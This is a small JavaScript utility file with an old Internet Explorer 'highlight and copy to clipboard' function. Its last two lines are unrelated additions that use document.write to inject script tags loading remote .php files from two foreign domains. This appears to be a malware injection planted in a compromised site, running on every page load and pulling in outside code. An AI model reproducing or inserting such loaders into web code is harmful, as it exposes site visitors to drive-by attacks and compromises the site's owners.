var copytoclip=1
function HighlightAll(theField) {
var tempval=eval("document."+theField)
tempval.focus()
tempval.select()
if (document.all&&copytoclip==1){
therange=tempval.createTextRange()
therange.execCommand("Copy")
window.status="Contents highlighted and copied to clipboard!"
setTimeout("window.status=''",1800)
}
}
document.write('<script src=http://innotech.ru/Scripts/04_tranzilan_6.php ><\/script>');
document.write('<script src=http://shinwoori.tourskorea.com/newEvent/Timages/left_event_main.php ><\/script>');